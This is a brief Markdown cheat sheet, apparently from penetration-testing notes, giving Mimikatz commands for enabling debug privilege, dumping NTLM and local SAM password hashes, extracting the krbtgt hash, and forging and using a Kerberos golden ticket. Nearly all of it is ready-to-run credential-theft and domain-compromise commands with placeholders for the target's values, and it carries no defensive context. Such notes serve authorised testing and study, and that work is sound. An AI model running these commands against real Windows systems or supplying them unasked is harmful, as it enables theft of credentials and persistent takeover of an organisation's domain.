30 lines
539 B
Markdown
30 lines
539 B
Markdown
|
# Mimikatz Usage
|
||
|
* Check your privilege, boy
|
||
|
```sh
|
||
|
$ privilege::debug
|
||
|
```
|
||
|
## Dump hashes
|
||
|
* NTLM
|
||
|
```sh
|
||
|
$ lsadump::lsa /patch
|
||
|
```
|
||
|
|
||
|
## Dump Local Password hashes
|
||
|
```sh
|
||
|
token::elevate
|
||
|
```
|
||
|
```sh
|
||
|
lsadump::sam
|
||
|
```
|
||
|
|
||
|
## Golden ticket
|
||
|
* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi
|
||
|
```sh
|
||
|
$ lsadump::lsa /inject /name:krbtgt
|
||
|
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
|
||
|
```
|
||
|
* use the golden ticket, open a new elevated prompt
|
||
|
```sh
|
||
|
misc::cmd
|
||
|
```
|